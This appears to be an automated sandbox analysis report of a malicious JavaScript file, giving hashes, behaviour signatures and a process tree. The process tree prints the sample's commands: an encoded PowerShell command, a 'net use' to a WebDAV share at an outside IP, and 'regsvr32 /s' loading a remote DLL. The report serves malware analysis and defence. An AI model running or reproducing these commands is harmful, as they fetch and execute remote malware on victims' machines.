Analysis

  • max time kernel
    239s
  • max time network
    240s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 02:01

General

  • Target

    17481323262171426069.js

  • Size

    1.4MB

  • MD5

    efe76939bd74fd51b7c0a2f736d07904

  • SHA1

    e61ec5426def2b69c1fb953c982cfbde8b196cf5

  • SHA256

    8dc5c525c854fa1f7a70c8c996290c8af71b5609279d30d53dcec1984fbd4703

  • SHA512

    e7527ae59501b7a09f6fa5538ffc0a013fb95d85f83705739ab28887b96d55ab60cda2307afd75cd674d83bc92561c141dc69fdb4514f3d67443d8d972907876

  • SSDEEP

    12288:2tSyK/Pok2/p6tnjLo2jLdZ0tr0KXuXTPh03z9pVn1zEPu:GQ/Pok2/p6tnjLo2jLd2WKNpjiu

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Delays execution with timeout.exe 1 IoCs
  • Runs net.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\17481323262171426069.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA4ADYAMgA2ADEAMgA3ADQANAAxADMANQAxADMALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\system32\timeout.exe
        "C:\Windows\system32\timeout.exe" 1
        3⤵
        • Delays execution with timeout.exe
        PID:2784
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\system32\net.exe
          net use \\94.159.113.79@8888\davwwwroot\
          4⤵
            PID:2904
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Windows\system32\regsvr32.exe
            regsvr32 /s \\94.159.113.79@8888\davwwwroot\86261274413513.dll
            4⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2972

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2952-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

      Filesize

      4KB

    • memory/2952-6-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB

    • memory/2952-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

      Filesize

      2.9MB

    • memory/2952-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB

    • memory/2952-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB

    • memory/2952-7-0x0000000001F10000-0x0000000001F18000-memory.dmp

      Filesize

      32KB

    • memory/2952-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB

    • memory/2952-11-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB

    • memory/2952-12-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

      Filesize

      9.6MB